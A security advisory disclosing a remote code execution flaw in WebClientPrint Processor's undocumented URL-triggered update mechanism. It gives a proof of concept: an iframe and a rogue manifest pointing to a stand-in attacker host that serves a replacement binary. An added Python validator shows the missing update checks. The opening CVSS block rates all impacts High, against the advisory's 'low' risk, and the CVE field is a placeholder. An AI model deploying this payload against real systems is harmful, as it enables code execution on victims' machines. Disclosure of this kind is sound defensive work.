Attack Vector: Network (AV)
  The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed "remotely exploitable" and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity: Low (AC)
  The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required: None (PR)
  The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction: None (UI)
  The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include:
  - a remote attacker is able to send packets to a target system
  - a locally authenticated attacker executes code to elevate privileges
Scope: Unchanged (S)
  An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality: High (C)
  There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity: High (I)
  There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability: High (A)
  There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
WebClientPrint Processor 2.0.15.109 Updates Remote Code Execution
Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Updates
RedTeam Pentesting discovered that rogue updates trigger a remote code
execution vulnerability in WebClientPrint Processor (WCPP). These
updates may be distributed through specially crafted websites and are
processed without any user interaction as soon as the website is
accessed. However, the browser must run with administrative privileges.
Details
=======
Product: Neodynamic WebClientPrint Processor
Affected Versions: 2.0.15.109 (Microsoft Windows)
Fixed Versions: >= 2.0.15.910
Vulnerability Type: Remote Code Execution
Security Risk: low
Vendor URL: http://www.neodynamic.com/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-009
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
Introduction
============
Neodynamic's WebClientPrint Processor is a client-side application,
which allows server-side applications to print documents on a client's
printer without user interaction, bypassing the browser's print
functionality. The server-side application may be written in ASP.NET or
PHP while on the client-side multiple platforms and browsers are
supported.
"Send raw data, text and native commands to client printers without
showing or displaying any print dialog box!" (Neodynamic's website)
More Details
============
Upon installation under Microsoft Windows, WCPP registers itself as a
handler for the "webclientprint" URL scheme. Thus, any URL starting with
"webclientprint:" is handled by WCPP. For example, entering
webclientprint:-about
in the URL bar of a browser opens the about box of WCPP.
During RedTeam Pentesting's investigation it turned out that WCPP
supports an undocumented update mechanism. Through the following URL the
update mechanism is triggered:
webclientprint:-update:http://legitimate.example.com/somedir/manifest.xml
This instructs WCPP to fetch the file "manifest.xml" from the
"legitimate.example.com" host. Furthermore, it was found that an XML
file of the following structure is expected:
------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<AvailableVersion>5.0.0</AvailableVersion>
<AppUrl>http://legitimate.example.com/somedir/wcpp.exe</AppUrl>
</manifest>
------------------------------------------------------------------------
Next, the XML file is parsed and the updated version of WCPP is fetched
from the URL
http://legitimate.example.com/somedir/wcpp.exe
with the returned byte stream being written to
C:\Program Files (x86)\Neodynamic\WCPP for Windows\v2.0\wcpp.exe
on a Windows 7 x86_64 machine. For the write process to succeed,
elevated or administrative privileges are required. Thus, the browser
which invokes WCPP must run with elevated or administrative privileges.
Proof of Concept
================
An attacker may prepare a malicious website containing the following
HTML code:
------------------------------------------------------------------------
<html>
<body>
<iframe src="webclientprint:-update:http://attack.example.com/somedir/manifest.xml">
</iframe>
</body>
</html>
------------------------------------------------------------------------
Furthermore, the attacker can provide a rogue manifest.xml as follows:
------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<AvailableVersion>5.0.0</AvailableVersion>
<AppUrl>http://attack.example.com/somedir/wcpp.exe</AppUrl>
</manifest>
------------------------------------------------------------------------
Finally, arbitrary code may be placed at the AppUrl URL:
http://attack.example.com/somedir/wcpp.exe
If the malicious website is visited by a WCPP user, the WCPP handler
(wcpp.exe) of the user's machine is replaced by code arbitrarily chosen
by the attacker. A visual indication of the update progress is displayed
and the success is indicated through a message box. However, successful
exploitation requires no user interaction. Any subsequent invocation of
an arbitrary webclientprint URL will result in the execution of the
attacker's code. Thus, the attacker may deliver a second inline frame
containing a webclientprint URL in order to force immediate execution of
the attacker's code.
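As an added illustration (not Neodynamic's code and not the fix the vendor shipped), the checks a handler for the "-update:" URL and the manifest format above would need before fetching AppUrl. The trusted host, the installed version and both manifests are constructed from the advisory's example values, and the binary is required over HTTPS, which the advisory's own example URLs do not use.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
# Assumption: the advisory's example host stands in for the vendor's real
# update host; the installed version is the affected release.
TRUSTED_UPDATE_HOSTS = {"legitimate.example.com"}
INSTALLED_VERSION = "2.0.15.109"

# Constructed manifests: rogue one mirrors the proof of concept, good one is HTTPS on the trusted host.
ROGUE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<AvailableVersion>5.0.0</AvailableVersion>
<AppUrl>http://attack.example.com/somedir/wcpp.exe</AppUrl>
</manifest>"""
GOOD_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<AvailableVersion>2.0.15.910</AvailableVersion>
<AppUrl>https://legitimate.example.com/somedir/wcpp.exe</AppUrl>
</manifest>"""

def parse_update_url(handler_url):
    """Return the manifest URL carried by 'webclientprint:-update:<url>', else None."""
    prefix = "webclientprint:-update:"
    return handler_url[len(prefix):] if handler_url.lower().startswith(prefix) else None

def version_tuple(text):
    return tuple(int(part) for part in text.strip().split("."))

def validate_manifest(manifest_url, manifest_xml, installed=INSTALLED_VERSION,
                      trusted_hosts=TRUSTED_UPDATE_HOSTS):
    """Return (accepted, reason); the vulnerable handler performed none of these checks."""
    if urlsplit(manifest_url).hostname not in trusted_hosts:
        return False, "manifest not served from a trusted update host"
    try:
        root = ET.fromstring(manifest_xml.encode("utf-8"))
    except ET.ParseError:
        return False, "manifest is not well-formed XML"
    version, app_url = root.findtext("AvailableVersion"), root.findtext("AppUrl")
    if version is None or app_url is None:
        return False, "manifest lacks AvailableVersion or AppUrl"
    try:
        if version_tuple(version) <= version_tuple(installed):
            return False, "offered version is not newer than the installed one"
    except ValueError:
        return False, "malformed version string"
    target = urlsplit(app_url)
    if target.scheme != "https" or target.hostname not in trusted_hosts:
        return False, "AppUrl must be HTTPS on a trusted update host"
    # A real updater must additionally verify a code signature on the binary.
    return True, "update accepted"
```

Note that the rogue manifest is internally consistent (manifest and binary on the same host), so a same-origin check alone would not stop it; the host allowlist is what rejects it.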
Workaround
==========
Affected users should disable the WCPP handler and upgrade to a fixed
version as soon as possible.
Fix
===
Install a WCPP version greater than or equal to 2.0.15.910 [0].
Security Risk
=============
If a WCPP user visits an attacker-controlled website, the attacker may
execute arbitrary code on the machine of the victim user. However,
successful exploitation is only possible if the browser is running with
elevated or administrative privileges. On modern Microsoft Windows
systems, this is a rather strong prerequisite. Furthermore, the update
process is indicated on the user's screen, potentially causing
suspicion.
If successful, the attacker gains administrative privileges as well. A
skilful attacker may restore the original WCPP immediately while
migrating the malicious code to another place. This way, WCPP
functionality would not be disrupted and the attacked users may be
tricked into believing that a legitimate update has just occurred.
Because of the rarely fulfilled prerequisite of a browser running with
elevated or administrative privileges, this vulnerability is estimated
to pose a low risk.
Timeline
========
2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their
clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released
References
==========
[0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/
--
RedTeam Pentesting GmbH              Tel.: +49 241 510081-0
Dennewartstr. 25-27                  Fax : +49 241 510081-99
52068 Aachen                         https://www.redteam-pentesting.de
Germany                              Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen